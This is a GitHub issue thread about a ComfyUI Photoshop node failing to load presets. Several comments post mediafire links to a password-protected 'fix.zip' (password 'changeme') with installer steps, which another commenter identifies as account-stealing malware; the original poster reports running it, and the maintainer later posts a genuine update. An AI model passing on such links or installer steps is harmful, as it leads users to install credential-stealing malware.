### ISSUE TITLE
为什么还是无法加载预设？

### ISSUE THREAD

**Issue by guangxinzhao** [NimaNzrii/comfyui-photoshop#212]
<img width="474" alt="iShot_2024-08-26_12 14 08" src="https://github.com/user-attachments/assets/ae141182-27ef-468c-bb04-b6a72cf29371">

**Comment by zh2650307** [comment]
我已经提供解决方案：https://github.com/NimaNzrii/comfyui-photoshop/issues/214

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NimaNzrii** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Sorry sir , what's This? Is this a fix for Chinese users?

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MahouShoujoMivutilde** [comment]
No fix should come from some shady link posted by some random unaffiliated with the repo account.

Do **NOT** run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere, like happened to this person.

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

**Comment by guangxinzhao** [comment]
After installing the fix program, the interface for selecting "gcc" did not appear. I changed the node and did not get a solution, still unable to load the preset settings

https://github.com/user-attachments/assets/069f0128-2e99-4761-ae00-4caf910e7f14

**Comment by bubbl000** [comment]
https://github.com/NimaNzrii/comfyui-photoshop/issues/220#issue-2492698790

**Comment by NimaNzrii** [comment]
## Language Support added✨
update the node and reload the sd1.5 workflow

![Untitled-1](https://github.com/user-attachments/assets/2c069975-0f39-4c6a-a87a-116b9bd58f82)
